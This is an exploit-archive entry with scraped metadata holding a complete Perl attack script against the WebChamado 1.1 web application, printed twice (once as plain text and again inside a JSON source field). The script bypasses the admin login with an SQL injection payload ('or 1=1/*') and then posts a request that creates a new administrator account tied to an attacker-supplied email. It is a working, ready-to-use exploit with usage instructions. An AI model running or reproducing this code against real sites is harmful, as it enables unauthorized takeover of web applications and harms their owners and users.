ID 1337DAY-ID-3166
Type zdt
Reporter CWH Underground
Modified 2008-06-13T00:00:00
Description
Exploit for unknown platform in category web applications
==========================================
WebChamado 1.1 Arbitrary Add Admin Exploit
==========================================
#!/usr/bin/perl
#============================================
# WebChamado 1.1 Arbitrary Add Admin Exploit
#============================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / `\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 12 June 2008
#
#####################################################
#APPLICATION : WebChamado
#VERSION : 1.1
#DOWNLOAD : http://downloads.sourceforge.net/webchamado
######################################################
#
#Note: magic_quotes_gpc = off
#
#This Exploit will Add user to administrator's privilege and you will get password from email..
use LWP;
use HTTP::Request;
use HTTP::Cookies;
if ($#ARGV + 1 != 3)
{
print "\n==============================================\n";
print " WebChamado 1.1 Arbitrary Add Admin Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " \n";
print "Usage: ./xpl-webchamado.pl <WebChamado URL> <user> <email>\n";
print "Ex. ./xpl-webchamado.pl http://www.target.com/WebChamado/ cwhunderground cwh\@cwh.com\n";
exit();
}
$cmsurl = $ARGV[0];
$user = $ARGV[1];
$mail = $ARGV[2];
$loginurl = $cmsurl."admin/index.php";
$adduserurl = $cmsurl."admin/corpo.php?menuadmin_responsavel=S&rsp_tipusr=U";
$post_content = "rsp_tipusr=U&rsp_nome=".$user."&rsp_codund=01&rsp_coddep=31&rsp_codfun=46&rsp_eml=".$mail."&rsp_adm=1&rsp_mst=S&rsp_btnresponsavel=Confirmar";
print "\n..::Login Page URL::..\n";
print "$loginurl\n";
print "\n..::Add User Page URL::..\n";
print "$adduserurl\n\n";
$ua = LWP::UserAgent->new;
$ua->cookie_jar(HTTP::Cookies->new);
$request = HTTP::Request->new (POST => $loginurl);
$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
$request->content_type ('application/x-www-form-urlencoded');
$request->content ('eml=\') or 1=1/*&pas=masteradm&btn=Enviar');
$response = $ua->request($request);
$content = $response->content;
if ($content =~ /index_ok/)
{
print "Login Success !!!\n\n";
}
else
{
print "Login Failed !!!\n\n";
exit();
}
$request = HTTP::Request->new (POST => $adduserurl);
$request->content_type ('application/x-www-form-urlencoded');
$request->content ($post_content);
$response = $ua->request($request);
$content = $response->content;
if ($content =~ /$user.*ADM.*$mail/)
{
print "Exploit Completed !!!\n";
}
else
{
print "Exploit Failed !!!\n";
}
# 0day.today [2018-03-01] #
{"published": "2008-06-13T00:00:00", "id": "1337DAY-ID-3166", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-03-01T03:34:34", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_FODHELPER", "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_SDCLT", "MSF:EXPLOIT/LINUX/LOCAL/CPI_RUNRSHELL_PRIV_ESC", "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_SLUIHIJACK", "MSF:PAYLOAD/CMD/UNIX/REVERSE_NCAT_SSL", "MSF:AUXILIARY/SCANNER/MSMAIL/ONPREM_ENUM", "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_TRIDENT"]}, {"type": "nessus", "idList": ["FEDORA_2018-E5A8B72D0D.NASL", "UBUNTU_USN-3166-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843008", "OPENVAS:1361412562310874800"]}, {"type": "exploitdb", "idList": ["EDB-ID:44213", "EDB-ID:44836"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148041"]}, {"type": "zdt", "idList": ["1337DAY-ID-30530", "1337DAY-ID-29911"]}, {"type": "mskb", "idList": ["KB2846071"]}, {"type": "seebug", "idList": ["SSV:92772"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6091475B7C3358E497093045025F72F1"]}, {"type": "ubuntu", "idList": ["USN-3166-1"]}], "modified": "2018-03-01T03:34:34", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "lastseen": "2018-03-01T03:34:34", "edition": 2, "title": "WebChamado 1.1 Arbitrary Add Admin Exploit", "href": "https://0day.today/exploit/description/3166", "modified": "2008-06-13T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": [], "sourceHref": "https://0day.today/exploit/3166", "references": [], "reporter": "CWH Underground", "sourceData": "==========================================\r\nWebChamado 1.1 Arbitrary Add Admin Exploit\r\n==========================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#============================================\r\n# WebChamado 1.1 Arbitrary Add Admin Exploit\r\n#============================================\r\n#\r\n# ,--^----------,--------,-----,-------^--,\r\n# | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\r\n# `+---------------------------^----------|\r\n# `\\_,-------, _________________________|\r\n# / XXXXXX /`| /\r\n# / XXXXXX / `\\ /\r\n# / XXXXXX /\\______(\r\n# / XXXXXX / \r\n# / XXXXXX /\r\n# (________( \r\n# `------'\r\n#\r\n#AUTHOR : CWH Underground\r\n#DATE : 12 June 2008\r\n#\r\n#####################################################\r\n#APPLICATION : WebChamado\r\n#VERSION : 1.1\r\n#DOWNLOAD : http://downloads.sourceforge.net/webchamado\r\n######################################################\r\n#\r\n#Note: magic_quotes_gpc = off\r\n#\r\n#This Exploit will Add user to administrator's privilege and you will get password from email..\r\n\r\n\r\n\r\nuse LWP;\r\nuse HTTP::Request;\r\nuse HTTP::Cookies;\r\n\r\nif ($#ARGV + 1 != 3)\r\n{\r\n print \"\\n==============================================\\n\";\r\n print \" WebChamado 1.1 Arbitrary Add Admin Exploit \\n\";\r\n print \" \\n\";\r\n print \" Discovered By CWH Underground \\n\";\r\n print \"==============================================\\n\";\r\n print \" \\n\";\r\n print \" \\n\"; \r\n print \"Usage: ./xpl-webchamado.pl <WebChamado URL> <user> <email>\\n\";\r\n print \"Ex. ./xpl-webchamado.pl http://www.target.com/WebChamado/ cwhunderground cwh\\@cwh.com\\n\";\r\n exit();\r\n}\r\n\r\n$cmsurl = $ARGV[0];\r\n$user = $ARGV[1];\r\n$mail = $ARGV[2];\r\n\r\n\r\n$loginurl = $cmsurl.\"admin/index.php\";\r\n$adduserurl = $cmsurl.\"admin/corpo.php?menuadmin_responsavel=S&rsp_tipusr=U\";\r\n$post_content = \"rsp_tipusr=U&rsp_nome=\".$user.\"&rsp_codund=01&rsp_coddep=31&rsp_codfun=46&rsp_eml=\".$mail.\"&rsp_adm=1&rsp_mst=S&rsp_btnresponsavel=Confirmar\";\r\n\r\nprint \"\\n..::Login Page URL::..\\n\";\r\nprint \"$loginurl\\n\";\r\nprint \"\\n..::Add User Page URL::..\\n\";\r\nprint \"$adduserurl\\n\\n\";\r\n\r\n$ua = LWP::UserAgent->new;\r\n$ua->cookie_jar(HTTP::Cookies->new);\r\n\r\n$request = HTTP::Request->new (POST => $loginurl);\r\n$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');\r\n$request->content_type ('application/x-www-form-urlencoded');\r\n$request->content ('eml=\\') or 1=1/*&pas=masteradm&btn=Enviar');\r\n\r\n$response = $ua->request($request);\r\n\r\n$content = $response->content;\r\n\r\nif ($content =~ /index_ok/)\r\n{\r\n print \"Login Success !!!\\n\\n\";\r\n}\r\nelse\r\n{\r\n print \"Login Failed !!!\\n\\n\";\r\n exit();\r\n}\r\n\r\n$request = HTTP::Request->new (POST => $adduserurl);\r\n$request->content_type ('application/x-www-form-urlencoded');\r\n$request->content ($post_content);\r\n$response = $ua->request($request);\r\n\r\n$content = $response->content;\r\n\r\nif ($content =~ /$user.*ADM.*$mail/)\r\n{\r\n print \"Exploit Completed !!!\\n\";\r\n}\r\nelse\r\n{\r\n print \"Exploit Failed !!!\\n\";\r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-01] #"}
{}
